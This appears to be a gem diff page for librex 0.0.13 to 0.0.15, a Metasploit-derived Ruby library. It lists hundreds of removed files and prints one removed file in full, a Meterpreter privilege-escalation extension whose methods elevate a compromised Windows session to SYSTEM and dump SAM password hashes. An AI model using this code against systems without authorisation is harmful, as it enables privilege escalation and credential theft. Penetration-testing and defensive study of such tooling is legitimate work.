librex 0.0.13 → 0.0.15
Sign up to get free protection for your applications and to get access to all the features.
- data/README.markdown +1 -1
- data/Rakefile +1 -0
- metadata +3 -435
- data/lib/rex/LICENSE +0 -29
- data/lib/rex/arch.rb +0 -103
- data/lib/rex/arch/sparc.rb +0 -75
- data/lib/rex/arch/sparc.rb.ut.rb +0 -18
- data/lib/rex/arch/x86.rb +0 -513
- data/lib/rex/arch/x86.rb.ut.rb +0 -93
- data/lib/rex/assembly/nasm.rb +0 -104
- data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
- data/lib/rex/codepage.map +0 -104
- data/lib/rex/compat.rb +0 -311
- data/lib/rex/constants.rb +0 -113
- data/lib/rex/elfparsey.rb +0 -11
- data/lib/rex/elfparsey/elf.rb +0 -123
- data/lib/rex/elfparsey/elfbase.rb +0 -258
- data/lib/rex/elfparsey/exceptions.rb +0 -27
- data/lib/rex/elfscan.rb +0 -12
- data/lib/rex/elfscan/scanner.rb +0 -207
- data/lib/rex/elfscan/search.rb +0 -46
- data/lib/rex/encoder/alpha2.rb +0 -31
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
- data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
- data/lib/rex/encoder/alpha2/generic.rb +0 -114
- data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
- data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
- data/lib/rex/encoder/ndr.rb +0 -89
- data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
- data/lib/rex/encoder/nonalpha.rb +0 -61
- data/lib/rex/encoder/nonupper.rb +0 -64
- data/lib/rex/encoder/xdr.rb +0 -106
- data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
- data/lib/rex/encoder/xor.rb +0 -69
- data/lib/rex/encoder/xor/dword.rb +0 -13
- data/lib/rex/encoder/xor/dword_additive.rb +0 -13
- data/lib/rex/encoders/xor_dword.rb +0 -35
- data/lib/rex/encoders/xor_dword_additive.rb +0 -53
- data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
- data/lib/rex/encoding/xor.rb +0 -20
- data/lib/rex/encoding/xor.rb.ts.rb +0 -14
- data/lib/rex/encoding/xor/byte.rb +0 -15
- data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
- data/lib/rex/encoding/xor/dword.rb +0 -21
- data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
- data/lib/rex/encoding/xor/dword_additive.rb +0 -92
- data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
- data/lib/rex/encoding/xor/exceptions.rb +0 -17
- data/lib/rex/encoding/xor/generic.rb +0 -146
- data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
- data/lib/rex/encoding/xor/qword.rb +0 -15
- data/lib/rex/encoding/xor/word.rb +0 -21
- data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
- data/lib/rex/exceptions.rb +0 -275
- data/lib/rex/exceptions.rb.ut.rb +0 -44
- data/lib/rex/exploitation/cmdstager.rb +0 -9
- data/lib/rex/exploitation/cmdstager/base.rb +0 -175
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
- data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
- data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
- data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
- data/lib/rex/exploitation/egghunter.rb +0 -277
- data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
- data/lib/rex/exploitation/encryptjs.rb +0 -77
- data/lib/rex/exploitation/heaplib.js.b64 +0 -331
- data/lib/rex/exploitation/heaplib.rb +0 -94
- data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
- data/lib/rex/exploitation/obfuscatejs.rb +0 -335
- data/lib/rex/exploitation/omelet.rb +0 -320
- data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
- data/lib/rex/exploitation/opcodedb.rb +0 -818
- data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
- data/lib/rex/exploitation/seh.rb +0 -92
- data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
- data/lib/rex/file.rb +0 -112
- data/lib/rex/file.rb.ut.rb +0 -16
- data/lib/rex/image_source.rb +0 -12
- data/lib/rex/image_source/disk.rb +0 -60
- data/lib/rex/image_source/image_source.rb +0 -46
- data/lib/rex/image_source/memory.rb +0 -37
- data/lib/rex/io/bidirectional_pipe.rb +0 -157
- data/lib/rex/io/datagram_abstraction.rb +0 -35
- data/lib/rex/io/stream.rb +0 -319
- data/lib/rex/io/stream_abstraction.rb +0 -197
- data/lib/rex/io/stream_server.rb +0 -211
- data/lib/rex/job_container.rb +0 -187
- data/lib/rex/logging.rb +0 -4
- data/lib/rex/logging/log_dispatcher.rb +0 -179
- data/lib/rex/logging/log_sink.rb +0 -42
- data/lib/rex/logging/sinks/flatfile.rb +0 -55
- data/lib/rex/logging/sinks/stderr.rb +0 -43
- data/lib/rex/machparsey.rb +0 -9
- data/lib/rex/machparsey/exceptions.rb +0 -34
- data/lib/rex/machparsey/mach.rb +0 -209
- data/lib/rex/machparsey/machbase.rb +0 -408
- data/lib/rex/machscan.rb +0 -9
- data/lib/rex/machscan/scanner.rb +0 -217
- data/lib/rex/mime.rb +0 -9
- data/lib/rex/mime/header.rb +0 -77
- data/lib/rex/mime/message.rb +0 -144
- data/lib/rex/mime/part.rb +0 -20
- data/lib/rex/nop/opty2.rb +0 -108
- data/lib/rex/nop/opty2.rb.ut.rb +0 -23
- data/lib/rex/nop/opty2_tables.rb +0 -300
- data/lib/rex/ole.rb +0 -205
- data/lib/rex/ole/clsid.rb +0 -47
- data/lib/rex/ole/difat.rb +0 -141
- data/lib/rex/ole/directory.rb +0 -231
- data/lib/rex/ole/direntry.rb +0 -240
- data/lib/rex/ole/docs/dependencies.txt +0 -8
- data/lib/rex/ole/docs/references.txt +0 -1
- data/lib/rex/ole/fat.rb +0 -99
- data/lib/rex/ole/header.rb +0 -204
- data/lib/rex/ole/minifat.rb +0 -77
- data/lib/rex/ole/propset.rb +0 -144
- data/lib/rex/ole/samples/create_ole.rb +0 -27
- data/lib/rex/ole/samples/dir.rb +0 -35
- data/lib/rex/ole/samples/dump_stream.rb +0 -34
- data/lib/rex/ole/samples/ole_info.rb +0 -23
- data/lib/rex/ole/storage.rb +0 -395
- data/lib/rex/ole/stream.rb +0 -53
- data/lib/rex/ole/substorage.rb +0 -49
- data/lib/rex/ole/util.rb +0 -157
- data/lib/rex/parser/arguments.rb +0 -97
- data/lib/rex/parser/arguments.rb.ut.rb +0 -67
- data/lib/rex/parser/ini.rb +0 -185
- data/lib/rex/parser/ini.rb.ut.rb +0 -29
- data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
- data/lib/rex/parser/ip360_xml.rb +0 -93
- data/lib/rex/parser/nessus_xml.rb +0 -118
- data/lib/rex/parser/netsparker_xml.rb +0 -94
- data/lib/rex/parser/nexpose_xml.rb +0 -131
- data/lib/rex/parser/nmap_xml.rb +0 -121
- data/lib/rex/parser/retina_xml.rb +0 -109
- data/lib/rex/payloads.rb +0 -1
- data/lib/rex/payloads/win32.rb +0 -2
- data/lib/rex/payloads/win32/common.rb +0 -26
- data/lib/rex/payloads/win32/kernel.rb +0 -53
- data/lib/rex/payloads/win32/kernel/common.rb +0 -54
- data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
- data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
- data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
- data/lib/rex/peparsey.rb +0 -12
- data/lib/rex/peparsey/exceptions.rb +0 -32
- data/lib/rex/peparsey/pe.rb +0 -212
- data/lib/rex/peparsey/pe_memdump.rb +0 -63
- data/lib/rex/peparsey/pebase.rb +0 -1680
- data/lib/rex/peparsey/section.rb +0 -136
- data/lib/rex/pescan.rb +0 -13
- data/lib/rex/pescan/analyze.rb +0 -309
- data/lib/rex/pescan/scanner.rb +0 -206
- data/lib/rex/pescan/search.rb +0 -56
- data/lib/rex/platforms.rb +0 -1
- data/lib/rex/platforms/windows.rb +0 -51
- data/lib/rex/poly.rb +0 -132
- data/lib/rex/poly/block.rb +0 -477
- data/lib/rex/poly/register.rb +0 -100
- data/lib/rex/poly/register/x86.rb +0 -40
- data/lib/rex/post.rb +0 -8
- data/lib/rex/post/dir.rb +0 -51
- data/lib/rex/post/file.rb +0 -172
- data/lib/rex/post/file_stat.rb +0 -220
- data/lib/rex/post/gen.pl +0 -13
- data/lib/rex/post/io.rb +0 -182
- data/lib/rex/post/meterpreter.rb +0 -4
- data/lib/rex/post/meterpreter/channel.rb +0 -445
- data/lib/rex/post/meterpreter/channel_container.rb +0 -54
- data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
- data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
- data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
- data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
- data/lib/rex/post/meterpreter/client.rb +0 -364
- data/lib/rex/post/meterpreter/client_core.rb +0 -274
- data/lib/rex/post/meterpreter/dependencies.rb +0 -3
- data/lib/rex/post/meterpreter/extension.rb +0 -32
- data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
- data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
- data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
- data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
- data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
- data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
- data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
- data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
- data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
- data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
- data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
- data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
- data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
- data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
- data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
- data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
- data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
- data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
- data/lib/rex/post/meterpreter/packet.rb +0 -688
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
- data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
- data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
- data/lib/rex/post/meterpreter/ui/console.rb +0 -137
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
- data/lib/rex/post/permission.rb +0 -26
- data/lib/rex/post/process.rb +0 -57
- data/lib/rex/post/thread.rb +0 -57
- data/lib/rex/post/ui.rb +0 -52
- data/lib/rex/proto.rb +0 -13
- data/lib/rex/proto.rb.ts.rb +0 -8
- data/lib/rex/proto/dcerpc.rb +0 -6
- data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
- data/lib/rex/proto/dcerpc/client.rb +0 -361
- data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
- data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
- data/lib/rex/proto/dcerpc/handle.rb +0 -47
- data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
- data/lib/rex/proto/dcerpc/ndr.rb +0 -72
- data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
- data/lib/rex/proto/dcerpc/packet.rb +0 -253
- data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
- data/lib/rex/proto/dcerpc/response.rb +0 -187
- data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
- data/lib/rex/proto/dcerpc/uuid.rb +0 -84
- data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
- data/lib/rex/proto/dhcp.rb +0 -7
- data/lib/rex/proto/dhcp/constants.rb +0 -33
- data/lib/rex/proto/dhcp/server.rb +0 -292
- data/lib/rex/proto/drda.rb +0 -5
- data/lib/rex/proto/drda.rb.ts.rb +0 -17
- data/lib/rex/proto/drda/constants.rb +0 -49
- data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
- data/lib/rex/proto/drda/packet.rb +0 -252
- data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
- data/lib/rex/proto/drda/utils.rb +0 -123
- data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
- data/lib/rex/proto/http.rb +0 -5
- data/lib/rex/proto/http.rb.ts.rb +0 -12
- data/lib/rex/proto/http/client.rb +0 -821
- data/lib/rex/proto/http/client.rb.ut.rb +0 -95
- data/lib/rex/proto/http/handler.rb +0 -46
- data/lib/rex/proto/http/handler/erb.rb +0 -128
- data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
- data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
- data/lib/rex/proto/http/handler/proc.rb +0 -60
- data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
- data/lib/rex/proto/http/header.rb +0 -161
- data/lib/rex/proto/http/header.rb.ut.rb +0 -46
- data/lib/rex/proto/http/packet.rb +0 -407
- data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
- data/lib/rex/proto/http/request.rb +0 -356
- data/lib/rex/proto/http/request.rb.ut.rb +0 -214
- data/lib/rex/proto/http/response.rb +0 -90
- data/lib/rex/proto/http/response.rb.ut.rb +0 -149
- data/lib/rex/proto/http/server.rb +0 -369
- data/lib/rex/proto/http/server.rb.ut.rb +0 -79
- data/lib/rex/proto/ntlm.rb +0 -7
- data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
- data/lib/rex/proto/ntlm/base.rb +0 -326
- data/lib/rex/proto/ntlm/constants.rb +0 -74
- data/lib/rex/proto/ntlm/crypt.rb +0 -415
- data/lib/rex/proto/ntlm/exceptions.rb +0 -9
- data/lib/rex/proto/ntlm/message.rb +0 -533
- data/lib/rex/proto/ntlm/utils.rb +0 -763
- data/lib/rex/proto/proxy/socks4a.rb +0 -440
- data/lib/rex/proto/rfb.rb +0 -19
- data/lib/rex/proto/rfb.rb.ut.rb +0 -37
- data/lib/rex/proto/rfb/cipher.rb +0 -84
- data/lib/rex/proto/rfb/client.rb +0 -207
- data/lib/rex/proto/rfb/constants.rb +0 -52
- data/lib/rex/proto/smb.rb +0 -7
- data/lib/rex/proto/smb.rb.ts.rb +0 -8
- data/lib/rex/proto/smb/client.rb +0 -1952
- data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
- data/lib/rex/proto/smb/constants.rb +0 -1047
- data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
- data/lib/rex/proto/smb/crypt.rb +0 -36
- data/lib/rex/proto/smb/evasions.rb +0 -66
- data/lib/rex/proto/smb/exceptions.rb +0 -858
- data/lib/rex/proto/smb/simpleclient.rb +0 -306
- data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
- data/lib/rex/proto/smb/utils.rb +0 -103
- data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
- data/lib/rex/proto/sunrpc.rb +0 -1
- data/lib/rex/proto/sunrpc/client.rb +0 -195
- data/lib/rex/proto/tftp.rb +0 -12
- data/lib/rex/proto/tftp/constants.rb +0 -39
- data/lib/rex/proto/tftp/server.rb +0 -497
- data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
- data/lib/rex/script.rb +0 -42
- data/lib/rex/script/base.rb +0 -59
- data/lib/rex/script/meterpreter.rb +0 -15
- data/lib/rex/script/shell.rb +0 -9
- data/lib/rex/service.rb +0 -48
- data/lib/rex/service_manager.rb +0 -141
- data/lib/rex/service_manager.rb.ut.rb +0 -32
- data/lib/rex/services/local_relay.rb +0 -423
- data/lib/rex/socket.rb +0 -684
- data/lib/rex/socket.rb.ut.rb +0 -107
- data/lib/rex/socket/comm.rb +0 -119
- data/lib/rex/socket/comm/local.rb +0 -412
- data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
- data/lib/rex/socket/ip.rb +0 -130
- data/lib/rex/socket/parameters.rb +0 -345
- data/lib/rex/socket/parameters.rb.ut.rb +0 -51
- data/lib/rex/socket/range_walker.rb +0 -346
- data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
- data/lib/rex/socket/ssl_tcp.rb +0 -184
- data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
- data/lib/rex/socket/ssl_tcp_server.rb +0 -122
- data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
- data/lib/rex/socket/subnet_walker.rb +0 -75
- data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
- data/lib/rex/socket/switch_board.rb +0 -278
- data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
- data/lib/rex/socket/tcp.rb +0 -76
- data/lib/rex/socket/tcp.rb.ut.rb +0 -64
- data/lib/rex/socket/tcp_server.rb +0 -67
- data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
- data/lib/rex/socket/udp.rb +0 -164
- data/lib/rex/socket/udp.rb.ut.rb +0 -44
- data/lib/rex/struct2.rb +0 -5
- data/lib/rex/struct2/c_struct.rb +0 -181
- data/lib/rex/struct2/c_struct_template.rb +0 -39
- data/lib/rex/struct2/constant.rb +0 -26
- data/lib/rex/struct2/element.rb +0 -44
- data/lib/rex/struct2/generic.rb +0 -73
- data/lib/rex/struct2/restraint.rb +0 -54
- data/lib/rex/struct2/s_string.rb +0 -72
- data/lib/rex/struct2/s_struct.rb +0 -111
- data/lib/rex/sync.rb +0 -6
- data/lib/rex/sync/event.rb +0 -94
- data/lib/rex/sync/read_write_lock.rb +0 -176
- data/lib/rex/sync/ref.rb +0 -57
- data/lib/rex/sync/thread_safe.rb +0 -82
- data/lib/rex/test.rb +0 -35
- data/lib/rex/text.rb +0 -1149
- data/lib/rex/text.rb.ut.rb +0 -190
- data/lib/rex/thread_factory.rb +0 -42
- data/lib/rex/time.rb +0 -65
- data/lib/rex/transformer.rb +0 -115
- data/lib/rex/transformer.rb.ut.rb +0 -38
- data/lib/rex/ui.rb +0 -21
- data/lib/rex/ui/interactive.rb +0 -254
- data/lib/rex/ui/output.rb +0 -78
- data/lib/rex/ui/output/none.rb +0 -18
- data/lib/rex/ui/progress_tracker.rb +0 -96
- data/lib/rex/ui/subscriber.rb +0 -149
- data/lib/rex/ui/text/color.rb +0 -97
- data/lib/rex/ui/text/color.rb.ut.rb +0 -18
- data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
- data/lib/rex/ui/text/input.rb +0 -117
- data/lib/rex/ui/text/input/buffer.rb +0 -75
- data/lib/rex/ui/text/input/readline.rb +0 -129
- data/lib/rex/ui/text/input/socket.rb +0 -95
- data/lib/rex/ui/text/input/stdio.rb +0 -45
- data/lib/rex/ui/text/irb_shell.rb +0 -57
- data/lib/rex/ui/text/output.rb +0 -80
- data/lib/rex/ui/text/output/buffer.rb +0 -61
- data/lib/rex/ui/text/output/file.rb +0 -43
- data/lib/rex/ui/text/output/socket.rb +0 -43
- data/lib/rex/ui/text/output/stdio.rb +0 -40
- data/lib/rex/ui/text/progress_tracker.rb +0 -56
- data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
- data/lib/rex/ui/text/shell.rb +0 -328
- data/lib/rex/ui/text/table.rb +0 -279
- data/lib/rex/ui/text/table.rb.ut.rb +0 -55
- data/lib/rex/zip.rb +0 -93
- data/lib/rex/zip/archive.rb +0 -184
- data/lib/rex/zip/blocks.rb +0 -182
- data/lib/rex/zip/entry.rb +0 -104
- data/lib/rex/zip/samples/comment.rb +0 -32
- data/lib/rex/zip/samples/mkwar.rb +0 -138
- data/lib/rex/zip/samples/mkzip.rb +0 -19
- data/lib/rex/zip/samples/recursive.rb +0 -58
@@ -1,111 +0,0 @@
|
|
1
|
-
#!/usr/bin/env ruby
|
2
|
-
|
3
|
-
require 'rex/post/meterpreter/extensions/priv/tlv'
|
4
|
-
require 'rex/post/meterpreter/extensions/priv/passwd'
|
5
|
-
require 'rex/post/meterpreter/extensions/priv/fs'
|
6
|
-
|
7
|
-
module Rex
|
8
|
-
module Post
|
9
|
-
module Meterpreter
|
10
|
-
module Extensions
|
11
|
-
module Priv
|
12
|
-
|
13
|
-
###
|
14
|
-
#
|
15
|
-
# This meterpreter extensions a privilege escalation interface that is capable
|
16
|
-
# of doing things like dumping password hashes and performing local
|
17
|
-
# exploitation.
|
18
|
-
#
|
19
|
-
###
|
20
|
-
class Priv < Extension
|
21
|
-
|
22
|
-
#
|
23
|
-
# Initializes the privilege escalationextension.
|
24
|
-
#
|
25
|
-
def initialize(client)
|
26
|
-
super(client, 'priv')
|
27
|
-
|
28
|
-
client.register_extension_aliases(
|
29
|
-
[
|
30
|
-
{
|
31
|
-
'name' => 'priv',
|
32
|
-
'ext' => self
|
33
|
-
},
|
34
|
-
])
|
35
|
-
|
36
|
-
# Initialize sub-classes
|
37
|
-
self.fs = Fs.new(client)
|
38
|
-
end
|
39
|
-
|
40
|
-
#
|
41
|
-
# Attempt to elevate the meterpreter to Local SYSTEM
|
42
|
-
#
|
43
|
-
def getsystem( technique=0 )
|
44
|
-
request = Packet.create_request( 'priv_elevate_getsystem' )
|
45
|
-
|
46
|
-
elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
|
47
|
-
|
48
|
-
if( client.platform == 'x64/win64' )
|
49
|
-
elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
|
50
|
-
else
|
51
|
-
elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
|
52
|
-
end
|
53
|
-
|
54
|
-
elevator_path = ::File.expand_path( elevator_path )
|
55
|
-
|
56
|
-
elevator_data = ""
|
57
|
-
|
58
|
-
::File.open( elevator_path, "rb" ) { |f|
|
59
|
-
elevator_data += f.read( f.stat.size )
|
60
|
-
}
|
61
|
-
|
62
|
-
request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
|
63
|
-
request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
|
64
|
-
request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
|
65
|
-
request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
|
66
|
-
|
67
|
-
# as some service routines can be slow we bump up the timeout to 90 seconds
|
68
|
-
response = client.send_request( request, 90 )
|
69
|
-
|
70
|
-
technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
|
71
|
-
|
72
|
-
if( response.result == 0 and technique != nil )
|
73
|
-
client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
|
74
|
-
client.sys.config.getprivs
|
75
|
-
client.framework.db.report_note(
|
76
|
-
:host => client.sock.peerhost,
|
77
|
-
:workspace => client.framework.db.workspace,
|
78
|
-
:type => "meterpreter.getsystem",
|
79
|
-
:data => {:technique => technique}
|
80
|
-
) rescue nil
|
81
|
-
return [ true, technique ]
|
82
|
-
end
|
83
|
-
|
84
|
-
return [ false, 0 ]
|
85
|
-
end
|
86
|
-
|
87
|
-
#
|
88
|
-
# Returns an array of SAM hashes from the remote machine.
|
89
|
-
#
|
90
|
-
def sam_hashes
|
91
|
-
# This can take a long long time for large domain controls, bump the timeout to one hour
|
92
|
-
response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)
|
93
|
-
|
94
|
-
response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
|
95
|
-
SamUser.new(hash)
|
96
|
-
}
|
97
|
-
end
|
98
|
-
|
99
|
-
#
|
100
|
-
# Modifying privileged file system attributes.
|
101
|
-
#
|
102
|
-
attr_reader :fs
|
103
|
-
|
104
|
-
protected
|
105
|
-
|
